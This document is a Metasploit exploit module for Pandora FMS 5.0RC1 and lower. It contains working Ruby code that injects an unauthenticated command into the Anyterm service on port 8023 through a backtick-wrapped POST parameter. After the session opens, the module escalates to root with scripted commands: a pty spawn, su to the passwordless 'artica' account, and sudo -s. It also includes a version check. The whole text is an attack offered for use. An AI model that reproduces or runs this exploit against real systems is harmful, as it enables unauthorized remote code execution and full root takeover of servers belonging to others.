Pandora FMS 5.0RC1 Remote Code Execution

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Pandora FMS Remote Code Execution",  
'Description' => %q{  
This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.  
It will leverage an unauthenticated command injection in the Anyterm service on  
port 8023. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1  
the user "artica" is not assigned a password by default, which makes it possible to su  
to this user from the "pandora" user. The "artica" user has access to sudo without a  
password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0  
and lower force a password for the "artica" user during installation.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module  
],  
'References' =>  
[  
],  
'Payload' =>  
{  
'BadChars' => "",  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl python',  
}  
},  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,  
'Targets' =>  
[  
['Pandora 5.0RC1', {}]  
],  
'Privileged' => true,  
'DisclosureDate' => "Jan 29 2014",  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(8023),  
OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),  
], self.class)  
end  
  
def on_new_session(client)  
print_status("#{peer} - Trying to escalate privileges to root")  
[  
# ignore SIGHUP so the server doesn't kill our root shell  
"trap '' HUP",  
# Spawn a pty for su/sudo  
"python -c 'import pty;pty.spawn(\"/bin/sh\")'",  
# Su to the passwordless "artica" account  
"su - artica",  
# The "artica" use has sudo rights without the need for a  
# password, thus gain root priveleges  
"sudo -s",  
].each do |command|  
vprint_status(command)  
client.shell_write(command + "\n")  
end  
  
super  
end  
  
def check  
# Check version  
print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway")  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, "anyterm.html")  
})  
  
if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")  
print_good("#{peer} - Pandora FMS Remote Gateway Detected!")  
return Exploit::CheckCode::Detected  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
print_status("#{peer} - Sending payload")  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, "/anyterm-module"),  
'vars_post' => {  
'a' => "open",  
'p' => "`#{payload.encoded}`"  
}  
})  
  
if !res || res.code != 200  
fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")  
end  
end  
  
end  
`